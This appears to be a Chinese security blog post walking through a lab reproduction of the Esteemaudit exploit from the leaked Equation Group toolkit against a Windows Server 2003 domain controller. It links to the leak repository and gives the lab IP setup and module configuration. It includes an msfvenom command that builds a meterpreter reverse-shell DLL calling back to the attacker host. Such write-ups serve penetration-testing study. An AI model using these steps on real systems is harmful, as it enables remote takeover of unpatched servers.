ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP

近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息。以下是其中Esteemaudit漏洞复现过程。

前期准备

IP 系统信息 用途 备注
192.168.146.132 Windows xp 攻击机 需安python2.6.6&pywin32
192.168.146.129 kali 2.0 用于生成攻击payload(反弹shell等)和控制反弹的shell会话 生成reverse shell 的dll
192.168.146.136 Windows Server 2003 靶机 域控环境

靶机环境

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

需要域控环境

Esteemaudit漏洞复现过程

use Esteemaudit使用漏洞模块

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

设置目标IP和端口

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

然后基本上默认,基本配置如下:

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

运行后再进行配置。

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

然后基本上选择相对应的设置,CallbackIp填自己的,端口随便

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

然后配置DLL。注意这里默认路径基本上是不对,找到自己对应的文件路径进行修改:

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

然后基本上配置如下

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

可以运行了

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

利用Pcdlllauncher注入DLL

使用Pcdlllauncher

use Pcdlllauncher

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

然后生成用于反弹shell的dll payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.129 LPORT=4444 -f dll >win.dll

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

然后进行配置

找到自己对应的文件路径修改

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

要注入的恶意DLL文件路径

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

然后基本上默认,运行就行了,成功注入

查看Metasploit,成功返回shell

ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

*本文作者:zusheng,转载请注明来自FreeBuf.COM

上一篇:java-cef系列视频第四集:自定义协议


下一篇:关于浏览器兼容问题及hack写法